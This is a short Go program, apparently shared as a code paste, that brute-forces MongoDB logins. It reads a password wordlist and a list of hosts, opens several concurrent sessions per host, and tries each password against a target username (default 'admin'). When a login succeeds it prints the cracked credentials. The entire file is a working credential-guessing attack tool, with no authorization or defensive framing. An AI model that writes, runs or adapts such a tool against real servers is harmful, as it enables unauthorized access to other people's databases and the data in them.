package mainimport ( "flag" "fmt" "labix.org/v2/mgo" "bytes" "io/i

1. package main
2.  
3. import (
4. "flag"
5. "fmt"
6. "labix.org/v2/mgo"
7. "bytes"
8. "io/ioutil"
9. "os"
10. )
11.  
12. var VERBOSE bool
13. var PASSFILE string
14. var HOSTNAMES string
15. var DB string
16. var USERNAME string
17. var THREADS int
18.  
19. var COUNT int
20. var TOTALWORDS int
21.  
22. func login(db *mgo.Database, user, pass []byte) bool {
23.  
24. // XXX: Check to make sure DB is still valid?
25. err := db.Login(string(user[:]), string(pass[:]))
26. if err == nil {
27. return true
28. }
29. return false
30. }
31.  
32. func loadPasswords(filename string) [][]byte {
33. data, err := ioutil.ReadFile(filename)
34. if err != nil {
35. panic(err)
36. }
37. words := bytes.Split(data, []byte{'\n'})
38.  
39. if VERBOSE {
40. fmt.Println("Loaded password list! Total words:", len(words))
41. }
42. TOTALWORDS = len(words)
43. return words
44. }
45.  
46. func loadHostnames(filename string) [][]byte {
47. data, err := ioutil.ReadFile(filename)
48. if err != nil {
49. line := []byte("10.1.1.21:27018")
50. return [][]byte{line}
51. }
52. hostnames := bytes.Split(data, []byte{'\n'})
53. return hostnames
54. }
55.  
56. func sessionBuilder(hostname, dbName string) (*mgo.Session, *mgo.Database) {
57. session, err := mgo.Dial(hostname)
58. if err != nil {
59. fmt.Println("Error building session")
60. panic(err)
61. }
62. session.SetMode(mgo.Monotonic, true)
63. db := session.DB(dbName)
64. return session, db
65. }
66.  
67. func passwordProducer(filename string, passwordChan chan []byte) {
68. passwords := loadPasswords(filename)
69. for _, password := range passwords {
70. passwordChan<- password
71. }
72. }
73.  
74. func passwordConsumer(id int, hostname string, user []byte, passwordChan chan []byte) {
75. session, db := sessionBuilder(hostname, DB)
76. count := 0
77. defer session.Close()
78.  
79. for {
80. password := <-passwordChan
81.  
82. if VERBOSE {
83. fmt.Printf("%d:\t%s, count: %d/%d, %s:%s\n", id, hostname, count, COUNT, user, password)
84. }
85.  
86. if login(db, user, password) {
87. fmt.Printf("WE DID IT!\n")
88. fmt.Printf("Password is %s:%s\n", user, password)
89. os.Exit(0)
90. }
91.  
92. count++
93. COUNT++
94. }
95. }
96.  
97. func main () {
98. fmt.Println("-------- MongoDB BruteForcer -------")
99. flag.BoolVar(&VERBOSE, "verbose", true, "display each attempt")
100. flag.StringVar(&HOSTNAMES, "hostname", "hosts.hosts", "hostname containing MongoDB")
101. flag.StringVar(&PASSFILE, "passfile", "pass.pass", "location of password file")
102. flag.StringVar(&DB, "database", "admin", "name of database to use")
103. flag.StringVar(&USERNAME, "username", "admin", "username to bruteforce")
104. flag.IntVar(&THREADS, "threads", 4, "number of db connections to use per machine")
105. flag.Parse()
106.  
107. passwordChannel := make(chan []byte, 10 * THREADS)
108. username := []byte(USERNAME)
109.  
110. hostnames := loadHostnames(HOSTNAMES)
111. threadIndex := 0
112. for _, hostname := range hostnames {
113. hostname := string(hostname)
114. if hostname == "" {
115. continue
116. }
117. for i := 0; i < THREADS; i++ {
118. go passwordConsumer(threadIndex, hostname, username, passwordChannel)
119. threadIndex++
120. }
121. }
122.  
123. passwordProducer(PASSFILE, passwordChannel)
124.  
125. }